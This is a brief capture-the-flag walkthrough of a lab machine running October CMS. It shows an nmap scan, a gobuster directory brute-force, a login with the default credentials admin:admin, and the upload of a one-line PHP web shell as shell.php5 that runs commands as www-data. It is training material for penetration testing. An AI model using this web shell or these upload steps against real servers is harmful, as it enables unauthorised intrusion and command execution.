nmap -sC -sV -A 10.10.10.16
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla

A full port scan reveals only the two ports. We need to run a directory bruteforce here
gobuster dir -u http://10.10.10.16 -w /usr/share/wordlists/directory-list-2.3-medium.txt
/blog
/forum
/themes
/modules
/account
/tests
/storage
/plugins
/backend
/backend/auth

We proceed to admin portal at http://10.10.10.16/backend/auth and try the default creds, admin:admin and we are logged in.
Now we create a simple php shell <?php system($_GET['cmd']);?> as shell.php5, upload it and see if we get a reverse shell.
And sure enough visiting : http://10.10.10.16/storage/app/media/shell.php5?cmd=id gives : uid=33(www-data) gid=33(www-data) groups=33(www-data)

